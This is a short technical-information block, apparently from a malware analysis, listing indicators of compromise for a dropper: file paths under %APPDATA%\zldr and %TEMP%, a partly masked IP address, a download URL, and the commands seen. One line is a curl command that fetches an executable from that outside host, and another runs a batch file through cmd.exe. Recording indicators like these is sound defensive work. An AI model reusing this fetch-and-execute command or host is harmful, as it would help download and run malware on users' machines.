Technical Information
- '' (downloaded from the Internet)
- %APPDATA%\zldr\runner.bat
- %APPDATA%\zldr\curl.exe
- %TEMP%\aaa123.exe
- '93.##0.123.73':80
- http://93.##0.123.73/static/files/z001.exe
- '%APPDATA%\zldr\curl.exe' -o "%TEMP%\aaa123.exe" http://93.##0.123.73/static/files/z001.exe
- '%TEMP%\aaa123.exe'
- '<SYSTEM32>\cmd.exe' /c "%APPDATA%\zldr\runner.bat "